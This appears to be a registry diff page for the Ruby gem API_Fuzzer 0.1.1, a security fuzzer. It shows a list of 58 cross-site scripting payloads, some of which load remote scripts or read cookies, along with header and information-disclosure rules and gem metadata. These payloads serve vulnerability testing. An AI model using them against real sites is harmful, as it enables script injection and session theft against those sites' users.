API_Fuzzer 0.1.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- checksums.yaml +7 -0
- data/.gitignore +10 -0
- data/.travis.yml +5 -0
- data/API_Fuzzer.gemspec +31 -0
- data/CODE_OF_CONDUCT.md +49 -0
- data/Gemfile +11 -0
- data/LICENSE.txt +21 -0
- data/README.md +91 -0
- data/Rakefile +10 -0
- data/app/controllers/ping_controller.rb +22 -0
- data/bin/console +14 -0
- data/bin/setup +8 -0
- data/config/routes.rb +4 -0
- data/lib/API_Fuzzer.rb +43 -0
- data/lib/API_Fuzzer/csrf_check.rb +41 -0
- data/lib/API_Fuzzer/engine.rb +5 -0
- data/lib/API_Fuzzer/error.rb +11 -0
- data/lib/API_Fuzzer/header_info.rb +50 -0
- data/lib/API_Fuzzer/idor_check.rb +62 -0
- data/lib/API_Fuzzer/privilege_escalation_check.rb +78 -0
- data/lib/API_Fuzzer/rate_limit_check.rb +69 -0
- data/lib/API_Fuzzer/redirect_check.rb +106 -0
- data/lib/API_Fuzzer/request.rb +69 -0
- data/lib/API_Fuzzer/resource_info.rb +51 -0
- data/lib/API_Fuzzer/sql_blind_check.rb +52 -0
- data/lib/API_Fuzzer/sql_check.rb +156 -0
- data/lib/API_Fuzzer/version.rb +3 -0
- data/lib/API_Fuzzer/vulnerability.rb +14 -0
- data/lib/API_Fuzzer/xss_check.rb +92 -0
- data/lib/API_Fuzzer/xxe_check.rb +47 -0
- data/payloads/blind_sql.txt +3 -0
- data/payloads/detect/sql.txt +89 -0
- data/payloads/sql.txt +196 -0
- data/payloads/xss.txt +58 -0
- data/rules/headers.yml +17 -0
- data/rules/info.yml +21 -0
- metadata +163 -0
data/payloads/xss.txt
ADDED
@@ -0,0 +1,58 @@
|
|
1
|
+
' onmouseover=alert(/Black.Spook/)
|
2
|
+
";eval(unescape(location))//# %0Aalert(0)
|
3
|
+
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
|
4
|
+
"><iframe%20src="http://google.com"%%203E
|
5
|
+
"><img src=x onerror=prompt(1);>
|
6
|
+
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
|
7
|
+
<SCRIPT SRC=//xss.rocks/.j>
|
8
|
+
'); alert('XSS
|
9
|
+
"><script>alert(1)</script>
|
10
|
+
\";alert('XSS');//
|
11
|
+
<%<!--'%><script>alert(1);</script -->
|
12
|
+
<%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); </%73%63%72%69%70%74>
|
13
|
+
<--`<img/src=` onerror=alert(1)> --!>
|
14
|
+
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
|
15
|
+
<<scr\0ipt/src=http://xss.com/xss.js></script
|
16
|
+
<<SCRIPT>alert("XSS");//<</SCRIPT>
|
17
|
+
<a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>
|
18
|
+
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
|
19
|
+
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
|
20
|
+
<a href="javascript:\u0061le%72t(1)"><button>
|
21
|
+
<a href="jAvAsCrIpT:alert(1)">X</a>
|
22
|
+
<a href=javascript:alert(document.cookie)>Click Here</a>
|
23
|
+
<a onmouseover="alert(document.cookie)">xxs link</a>
|
24
|
+
<a onmouseover=alert(document.cookie)>xxs link</a>
|
25
|
+
<iframe/onreadystatechange=alert(1)
|
26
|
+
<iframe/src \/\/onload = prompt(1)
|
27
|
+
<IMG DYNSRC=\"javascript:alert('XSS')\">
|
28
|
+
<IMG onmouseover="alert('xxs')">
|
29
|
+
<img src ?itworksonchrome?\/onerror = alert(1)???
|
30
|
+
<IMG SRC= onmouseover="alert('xxs')">
|
31
|
+
<IMG SRC="  javascript:alert('XSS');">
|
32
|
+
<img src="/" =_=" title="onerror='prompt(1)'">
|
33
|
+
<IMG SRC="jav	ascript:alert('XSS');">
|
34
|
+
<IMG SRC="jav&#x09;ascript:alert('XSS');">
|
35
|
+
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
|
36
|
+
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
|
37
|
+
<IMG SRC="javascript:alert('XSS')"
|
38
|
+
<img src="javascript:alert('XSS')">
|
39
|
+
<IMG SRC=javascript:alert('XSS')>
|
40
|
+
<IMG SRC=javascript:alert('XSS')>
|
41
|
+
<img src=`xx:xx`onerror=alert(1)>
|
42
|
+
<svg contentScriptType=text/vbs><script>MsgBox+1
|
43
|
+
<svg/onload=alert(1)
|
44
|
+
<svg><script ?>alert(1)
|
45
|
+
<svg><script onlypossibleinopera:-)> alert(1)
|
46
|
+
<svg><script>//
confirm(1);</script </svg>
|
47
|
+
<textarea id=ta onfocus=%22write('<script>alert(1)</script>')%22 autofocus></textarea>
|
48
|
+
<textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520alert(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)'%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;) autofocus></textarea>
|
49
|
+
<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>
|
50
|
+
<var onmouseover="prompt(1)">On Mouse Over</var>?
|
51
|
+
http://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/xss/test.xxe
|
52
|
+
http://www.<script>alert(1)</script .com
|
53
|
+
https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/xss/test.xxe
|
54
|
+
javascript:alert%28/xss/%29
|
55
|
+
javascript:alert(1)
|
56
|
+
PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
|
57
|
+
x”</title><img src%3dx onerror%3dalert(1)>
|
58
|
+
[[#%3Cscript%3Ealert(1)%3C/script%3E|
|
data/rules/headers.yml
ADDED
@@ -0,0 +1,17 @@
|
|
1
|
+
---
|
2
|
+
rules:
|
3
|
+
|
4
|
+
-
|
5
|
+
description: X-XSS Protection Header is not set properly
|
6
|
+
name: x-xss-protection
|
7
|
+
match: \A[01](; mode=block)?(; report=.*)?\z
|
8
|
+
|
9
|
+
-
|
10
|
+
description: Possible Clickjacking Vulnerability
|
11
|
+
name: x-frame-options
|
12
|
+
match: \A(SAMEORIGIN\z|DENY\z)
|
13
|
+
|
14
|
+
-
|
15
|
+
description: HSTS protection is not enabled in service
|
16
|
+
name: strict-transport-security
|
17
|
+
match: \Amax-age=\d+(; includeSubdomains)?(; preload)?\z
|
data/rules/info.yml
ADDED
@@ -0,0 +1,21 @@
|
|
1
|
+
---
|
2
|
+
rules:
|
3
|
+
|
4
|
+
-
|
5
|
+
#Server
|
6
|
+
description: Information Disclosure of Server version
|
7
|
+
match: server
|
8
|
+
-
|
9
|
+
# Powered-by Header
|
10
|
+
description: Information Disclosure through x-powered-by
|
11
|
+
match: x-powered-by
|
12
|
+
|
13
|
+
-
|
14
|
+
# ASP.NET MVC version
|
15
|
+
description: Information Disclosure of APS.NET MVC version
|
16
|
+
match: x-aspnetmvc-version
|
17
|
+
|
18
|
+
-
|
19
|
+
# ASP.NET version
|
20
|
+
description: Information Disclosure of ASP.NET version
|
21
|
+
match: x-aspnet-version
|
metadata
ADDED
@@ -0,0 +1,163 @@
|
|
1
|
+
--- !ruby/object:Gem::Specification
|
2
|
+
name: API_Fuzzer
|
3
|
+
version: !ruby/object:Gem::Version
|
4
|
+
version: 0.1.1
|
5
|
+
platform: ruby
|
6
|
+
authors:
|
7
|
+
- Lalith Rallabhandi
|
8
|
+
autorequire:
|
9
|
+
bindir: exe
|
10
|
+
cert_chain: []
|
11
|
+
date: 2016-10-14 00:00:00.000000000 Z
|
12
|
+
dependencies:
|
13
|
+
- !ruby/object:Gem::Dependency
|
14
|
+
name: http
|
15
|
+
requirement: !ruby/object:Gem::Requirement
|
16
|
+
requirements:
|
17
|
+
- - ~>
|
18
|
+
- !ruby/object:Gem::Version
|
19
|
+
version: '2.0'
|
20
|
+
type: :runtime
|
21
|
+
prerelease: false
|
22
|
+
version_requirements: !ruby/object:Gem::Requirement
|
23
|
+
requirements:
|
24
|
+
- - ~>
|
25
|
+
- !ruby/object:Gem::Version
|
26
|
+
version: '2.0'
|
27
|
+
- !ruby/object:Gem::Dependency
|
28
|
+
name: activesupport
|
29
|
+
requirement: !ruby/object:Gem::Requirement
|
30
|
+
requirements:
|
31
|
+
- - '>='
|
32
|
+
- !ruby/object:Gem::Version
|
33
|
+
version: '0'
|
34
|
+
type: :runtime
|
35
|
+
prerelease: false
|
36
|
+
version_requirements: !ruby/object:Gem::Requirement
|
37
|
+
requirements:
|
38
|
+
- - '>='
|
39
|
+
- !ruby/object:Gem::Version
|
40
|
+
version: '0'
|
41
|
+
- !ruby/object:Gem::Dependency
|
42
|
+
name: rails
|
43
|
+
requirement: !ruby/object:Gem::Requirement
|
44
|
+
requirements:
|
45
|
+
- - '>='
|
46
|
+
- !ruby/object:Gem::Version
|
47
|
+
version: '4.2'
|
48
|
+
type: :runtime
|
49
|
+
prerelease: false
|
50
|
+
version_requirements: !ruby/object:Gem::Requirement
|
51
|
+
requirements:
|
52
|
+
- - '>='
|
53
|
+
- !ruby/object:Gem::Version
|
54
|
+
version: '4.2'
|
55
|
+
- !ruby/object:Gem::Dependency
|
56
|
+
name: bundler
|
57
|
+
requirement: !ruby/object:Gem::Requirement
|
58
|
+
requirements:
|
59
|
+
- - ~>
|
60
|
+
- !ruby/object:Gem::Version
|
61
|
+
version: '1.12'
|
62
|
+
type: :development
|
63
|
+
prerelease: false
|
64
|
+
version_requirements: !ruby/object:Gem::Requirement
|
65
|
+
requirements:
|
66
|
+
- - ~>
|
67
|
+
- !ruby/object:Gem::Version
|
68
|
+
version: '1.12'
|
69
|
+
- !ruby/object:Gem::Dependency
|
70
|
+
name: rake
|
71
|
+
requirement: !ruby/object:Gem::Requirement
|
72
|
+
requirements:
|
73
|
+
- - ~>
|
74
|
+
- !ruby/object:Gem::Version
|
75
|
+
version: '10.0'
|
76
|
+
type: :development
|
77
|
+
prerelease: false
|
78
|
+
version_requirements: !ruby/object:Gem::Requirement
|
79
|
+
requirements:
|
80
|
+
- - ~>
|
81
|
+
- !ruby/object:Gem::Version
|
82
|
+
version: '10.0'
|
83
|
+
- !ruby/object:Gem::Dependency
|
84
|
+
name: minitest
|
85
|
+
requirement: !ruby/object:Gem::Requirement
|
86
|
+
requirements:
|
87
|
+
- - ~>
|
88
|
+
- !ruby/object:Gem::Version
|
89
|
+
version: '5.0'
|
90
|
+
type: :development
|
91
|
+
prerelease: false
|
92
|
+
version_requirements: !ruby/object:Gem::Requirement
|
93
|
+
requirements:
|
94
|
+
- - ~>
|
95
|
+
- !ruby/object:Gem::Version
|
96
|
+
version: '5.0'
|
97
|
+
description: APIFuzzer gem builds api for finding security issues through a fuzzer
|
98
|
+
email:
|
99
|
+
- lalithr95@gmail.com
|
100
|
+
executables: []
|
101
|
+
extensions: []
|
102
|
+
extra_rdoc_files: []
|
103
|
+
files:
|
104
|
+
- .gitignore
|
105
|
+
- .travis.yml
|
106
|
+
- API_Fuzzer.gemspec
|
107
|
+
- CODE_OF_CONDUCT.md
|
108
|
+
- Gemfile
|
109
|
+
- LICENSE.txt
|
110
|
+
- README.md
|
111
|
+
- Rakefile
|
112
|
+
- app/controllers/ping_controller.rb
|
113
|
+
- bin/console
|
114
|
+
- bin/setup
|
115
|
+
- config/routes.rb
|
116
|
+
- lib/API_Fuzzer.rb
|
117
|
+
- lib/API_Fuzzer/csrf_check.rb
|
118
|
+
- lib/API_Fuzzer/engine.rb
|
119
|
+
- lib/API_Fuzzer/error.rb
|
120
|
+
- lib/API_Fuzzer/header_info.rb
|
121
|
+
- lib/API_Fuzzer/idor_check.rb
|
122
|
+
- lib/API_Fuzzer/privilege_escalation_check.rb
|
123
|
+
- lib/API_Fuzzer/rate_limit_check.rb
|
124
|
+
- lib/API_Fuzzer/redirect_check.rb
|
125
|
+
- lib/API_Fuzzer/request.rb
|
126
|
+
- lib/API_Fuzzer/resource_info.rb
|
127
|
+
- lib/API_Fuzzer/sql_blind_check.rb
|
128
|
+
- lib/API_Fuzzer/sql_check.rb
|
129
|
+
- lib/API_Fuzzer/version.rb
|
130
|
+
- lib/API_Fuzzer/vulnerability.rb
|
131
|
+
- lib/API_Fuzzer/xss_check.rb
|
132
|
+
- lib/API_Fuzzer/xxe_check.rb
|
133
|
+
- payloads/blind_sql.txt
|
134
|
+
- payloads/detect/sql.txt
|
135
|
+
- payloads/sql.txt
|
136
|
+
- payloads/xss.txt
|
137
|
+
- rules/headers.yml
|
138
|
+
- rules/info.yml
|
139
|
+
homepage: https://github.com/lalithr95/API-Fuzzer
|
140
|
+
licenses:
|
141
|
+
- MIT
|
142
|
+
metadata: {}
|
143
|
+
post_install_message:
|
144
|
+
rdoc_options: []
|
145
|
+
require_paths:
|
146
|
+
- lib
|
147
|
+
required_ruby_version: !ruby/object:Gem::Requirement
|
148
|
+
requirements:
|
149
|
+
- - '>='
|
150
|
+
- !ruby/object:Gem::Version
|
151
|
+
version: '0'
|
152
|
+
required_rubygems_version: !ruby/object:Gem::Requirement
|
153
|
+
requirements:
|
154
|
+
- - '>='
|
155
|
+
- !ruby/object:Gem::Version
|
156
|
+
version: '0'
|
157
|
+
requirements: []
|
158
|
+
rubyforge_project:
|
159
|
+
rubygems_version: 2.6.6
|
160
|
+
signing_key:
|
161
|
+
specification_version: 4
|
162
|
+
summary: APIFuzzer gem builds api for finding security issues through a fuzzer
|
163
|
+
test_files: []
|